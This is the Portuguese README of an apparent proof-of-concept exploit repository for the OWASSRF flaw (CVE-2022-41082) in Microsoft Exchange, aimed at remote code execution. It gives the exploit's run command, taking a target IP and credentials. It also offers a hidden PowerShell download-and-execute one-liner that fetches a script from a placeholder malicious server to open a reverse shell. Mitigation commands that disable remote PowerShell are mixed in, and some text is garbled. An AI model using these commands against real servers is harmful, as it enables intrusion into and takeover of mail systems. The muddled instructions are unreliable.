
CVE-2022-41082-poc
Este repositório contém uma ferramenta de prova de conceito (PoC) para explorar a vulnerabilidade OWASSRF (CVE-2022-41082) em servidores Microsoft Exchange. O exploit permite que atacantes executem comandos arbitrários no servidor, comprometendo potencialmente o sistema.
A ferramenta aproveita uma vulnerabilidade OWASSRF para contornar a autenticação e obter execução remota de código (RCE) em um servidor Exchange. Ao explorar essa vulnerabilidade, um atacante pode executar comandos como se fosse um usuário autenticado, levando a sérias implicações de segurança.
Ao usar esta ferramenta, por favor certifique-se de manter a mesma sessão do Exchange Management Shell aberta. É crucial habilitar o acesso remoto ao PowerShell para pelo menos um usuário após desabilitá-lo para outros. Caso contrário, você pode perder o acesso ao Management Shell em todos os servidores Exchange.
Aqui estão alguns comandos úteis do PowerShell para verificar e gerenciar quem tem acesso:
Para ver quais usuários têm acesso remoto ao PowerShell e quais não têm, execute:
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $false'
Aviso: Tenha cuidado para não fechar a janela do Exchange Management Shell a menos que você adicione pelo menos um usuário de volta.
Você pode desabilitar o acesso ao PowerShell para todos os usuários usando os seguintes comandos:
$user = Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
$user | foreach {Set-User -Identity $_ -RemotePowerShellEnabled $false}
Ou use um único comando para alcançar o mesmo resultado:
Get-User -ResultSize Unlimited | Set-User -RemotePowerShellEnabled $false
Para conceder acesso remoto ao PowerShell a um usuário específico, execute:
Set-User "guest" -RemotePowerShellEnabled $true
Se você perder o acesso ao PowerShell para todos os usuários, pode criar um novo usuário de caixa de correio com direitos de administrador. Esse novo usuário irá contornar as políticas aplicadas, permitindo que você use o Exchange Management Shell novamente.
pip se necessário)Para executar a ferramenta PoC, execute o seguinte comando:
python3 poc.py -H <target_IP> -u <username> -p <password> -c <command_file>
Substitua <target_IP>, <username>, <password> e <command_file> pelos seus valores específicos.
Você pode modificar o comando no seu cmd_file para incluir um payload de shell reverso. Por exemplo:
powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('http://your-malicious-server.com/reverse.ps1')"
Este comando irá baixar e executar um script PowerShell do seu servidor, dando a você um shell reverso.
Para mais informações sobre a vulnerabilidade OWASSRF e o código PoC, visite o seguinte link: OWASSRF CVE-2022-41082 PoC e https://www.youtube.com/watch?v=c2DZYP6jc7g